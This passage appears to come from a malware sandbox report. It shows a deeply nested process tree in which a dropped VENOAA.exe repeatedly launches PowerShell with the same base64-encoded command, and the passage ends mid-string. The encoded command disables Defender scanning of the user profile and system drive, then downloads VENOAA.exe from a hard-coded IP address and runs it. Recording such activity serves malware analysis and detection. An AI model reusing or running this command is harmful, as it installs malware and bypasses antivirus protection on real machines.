        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        82⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        83⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        84⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        85⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        86⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        87⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        87⤵
        Executes dropped EXE
        
        PID:4800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        88⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        89⤵
        Executes dropped EXE
        
        PID:3496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        90⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        91⤵
        Executes dropped EXE
        
        PID:3256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        92⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        93⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:8
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        94⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        95⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        96⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        97⤵
        Executes dropped EXE
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        98⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        99⤵
        Executes dropped EXE
        
        PID:3384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        100⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        101⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        102⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        103⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        104⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        105⤵
        Executes dropped EXE
        
        PID:4360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAa